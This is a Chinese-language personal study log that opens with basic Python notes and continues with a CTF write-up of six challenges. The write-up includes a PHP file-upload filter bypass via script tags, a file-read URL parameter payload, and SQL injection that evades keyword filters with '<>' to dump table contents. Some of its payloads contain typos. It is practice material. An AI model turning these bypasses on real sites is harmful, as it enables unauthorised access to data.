記錄

2019-07-06：

Python是一門解釋型語言，擁有許多強大的標準庫，是完全面向對象語言

如果需要一段關鍵代碼運行得更快或者希望某些演算法不公開，可以把部分程式用c或c++編寫，然後在python程式中使用它們

缺點：

運行速度慢

國內市場較小

中文資料匱乏

可以使用任意文本編輯軟體做python開發

通常文件擴展名.py

常見錯誤：

手誤：

　　如：print寫成pirnt

python是一門解釋型語言一行錯誤，這行上面的語句任然能執行

將多條print寫在一行：

　　不建議把多條語句寫在一行，

縮進錯誤：

　　代碼排列不整齊多加了空格縮進等

python2.X預設不支持中文

python3支持中文

python3命令使用python3

極少部分第三方庫不支持python3.0語法，建議

　　先使用python3.0版本進行開發

　　然後使用python2.6、2.7執行，併進行一些相容性處理

python的解釋器：

互動式運行python程式

首選ipython支持自動補全，自動縮進，支持bash shell命令（控制台命令）

python單行註釋 #print("hello world")

為了整齊建議在#後面添加一個空格

python多行註釋""" 代碼 """

算數運算符：

2019-07-07：

writeup：

　題目一：看我迴旋13踢
　　密文：
　　synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}

　　使用rot13解密得flag：

　　　　flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1}

　題目二：flag不在變數中

　　構造payload：?hello=file("flag.php")

 　　題目三：Upload

　　上傳php

　　<?php

　　$fh=fopen('../flag.php','r');

　　echo fread($fh,filesize('../falg.php'));

　　fclose($fh);

　　?>

　　發現<?php 被過濾了

　　使用script標簽

　　<script language='PHP'>

　　$fh=fopen('../flag.'.strtolower('PHP'));

　　fclose($fh);

　　</script>

　　成功在上傳後文件源碼中找到flag

　　題目四：單身狗

　　題目中有一個二維碼但右下角被一隻單身狗給遮擋住了

　　使用ps將左上角的方塊複製一份覆蓋掉單身狗，使用線上二維碼掃描成功掃描出flag

 　　題目五：女神在哪?

　　下載附件包含一堆聊天記錄截圖和兩張風景圖

　　在聊天記錄裡面發現女神在溫州附近打開地圖找到溫州

　　有發現女神鏈接的WiFi是jthjfsbg，推測是一個賓館

　　wifi開頭為qt在溫州附近找到青田縣然後找到賓館為青田風尚賓館

　　得到flag{青田風尚賓館}

　　題目六：SQL

　　題目提示是SQL註入使用order by測試資料庫列發現出現inject code提示

　　猜測關鍵字過濾

　　使用/**/將關鍵字隔離發現不行

　　再使用<>分割關鍵字成功

　　使用ord<>er by 成功繞過關鍵字過濾

　　使用二分法找到資料庫有三列 order by 3

　　註入資料庫:

　　　　union select 1,table_name,3 from information_schema_tables where table_name=databse()

　　　　找到info和users數據表

　　　　union select 1,column_name,3 from information_schema_columns where table_name='info'

　　　　找到info表裡的flAg_T5ZNdrm欄位

　　　　unio<>n%20sele<>ct%20id,flAg_T5ZNdrm,title%20fro<>m%20info

　　　　成功找到flag